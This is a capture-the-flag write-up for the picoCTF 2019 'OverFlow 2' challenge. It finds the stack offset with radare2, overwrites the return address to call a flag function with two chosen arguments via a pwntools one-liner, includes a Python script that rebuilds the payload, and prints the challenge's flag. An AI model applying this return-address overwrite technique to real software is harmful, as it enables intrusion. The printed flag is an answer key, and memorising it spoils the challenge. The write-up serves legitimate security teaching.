# OverFlow 2

## Problem

> Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2\_2\_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.

* [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/OverFlow%202/vuln/README.md)
* [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/OverFlow%202/vuln.c)

## Solution

1. Find the offset/padding
   1. You can use the method described in [rop64](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/Binary/%20Exploitation/rop64/README.md) with pwntools' `cyclic` and `cyclic_find`, or you can use the following radare2 method
   2. Open vuln in [radare2](https://rada.re/r/) with `r2 ./vuln`
   3. Run `aaaa`
   4. Run `pdf @ sym.vuln` to get `var int local_b8h @ ebp-0xb8`
   5. The buffer starts at `ebp-0xb8`, so `0xb8` bytes fill it up to the saved `ebp`; 4 more bytes are needed to get past the saved `ebp` register, after which the next 4 bytes land on the return address
   6. So the offset is `0xb8+4`
2. Run `readelf -s vuln` to get the address of `flag`: `0x080485e6`
3. We can use `p32` from pwntools to pack each 32-bit address and value in little-endian byte order.
4. The 4 bytes after the address of `flag` are what `flag` will treat as its own return address; we don't care where it returns, so we pad that slot with `'a'*4`, which goes next in the payload.
5. Now we can add the two function arguments (`0xDEADBEEF` and `0xC0DED00D`), each packed little-endian with `p32`, in the order `flag` expects them.
6. Payload complete: `python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln`
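
The script below is an added illustration of the stack layout the steps above rely on (buffer, saved `ebp`, return address, then `flag`'s own return slot and its two arguments); it is not part of the original writeup. It replaces pwntools' `p32` with `struct.pack("<I")` (the same little-endian encoding) and includes a small De Bruijn pattern generator that mirrors the idea behind `cyclic`/`cyclic_find`, so the offset-finding step from 1.1 can be exercised offline. The "crash" value fed to `cyclic_find` is constructed in the script, not captured from the binary. The offset `0xb8+4`, the `flag` address `0x080485e6` and the two argument values come from the writeup.

```python
import struct
import string

# Values taken from the writeup: offset from radare2, flag address from readelf,
# and the two argument values flag() checks.
OFFSET = 0xB8 + 4          # 184 bytes of buffer + 4 bytes of saved ebp = 188
FLAG_ADDR = 0x080485E6     # readelf -s vuln
ARG1 = 0xDEADBEEF
ARG2 = 0xC0DED00D


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian; same encoding as pwntools' p32."""
    return struct.pack("<I", value)


def cyclic(length: int, alphabet: str = string.ascii_lowercase, n: int = 4) -> bytes:
    """De Bruijn-style pattern in which every n-byte window is unique (cf. pwntools cyclic)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if len(out) >= length:          # stop once we have enough characters
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length]).encode()


def cyclic_find(window: bytes, pattern: bytes) -> int:
    """Offset in the pattern of the 4 bytes that ended up in eip after a crash."""
    return pattern.find(window)


def build_payload(offset=OFFSET, target=FLAG_ADDR, arg1=ARG1, arg2=ARG2) -> bytes:
    """Same layout as the writeup's one-liner, built from labelled pieces."""
    return (
        b"a" * offset       # fill the buffer and overwrite the saved ebp
        + p32(target)       # overwrite vuln()'s return address with flag()
        + b"a" * 4          # slot flag() will read as its own return address (unused)
        + p32(arg1)         # flag()'s first argument  (esp+4 once flag() is entered)
        + p32(arg2)         # flag()'s second argument (esp+8 once flag() is entered)
    )


def parse_frame(payload: bytes, offset: int = OFFSET) -> dict:
    """Read the tail of the payload the way the CPU will after vuln() returns."""
    ret, fake_ret, a1, a2 = struct.unpack_from("<IIII", payload, offset)
    return {"ret": ret, "flag_ret": fake_ret, "arg1": a1, "arg2": a2}


if __name__ == "__main__":
    pattern = cyclic(300)
    # Constructed stand-in for the eip value a crash at offset 188 would leave behind.
    crash_eip = pattern[OFFSET:OFFSET + 4]
    print("offset:", cyclic_find(crash_eip, pattern))
    payload = build_payload()
    print("payload length:", len(payload))
    print({k: hex(v) for k, v in parse_frame(payload).items()})
```

`parse_frame` is there to check the layout, not to send anything: unpacking the tail of the payload at the offset should give back the `flag` address, the padding word, and the two arguments in that order, which is exactly what the stack will look like when `vuln` executes `ret`.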

### Flag

`picoCTF{arg5_and_r3turn5ce5cf61a}`
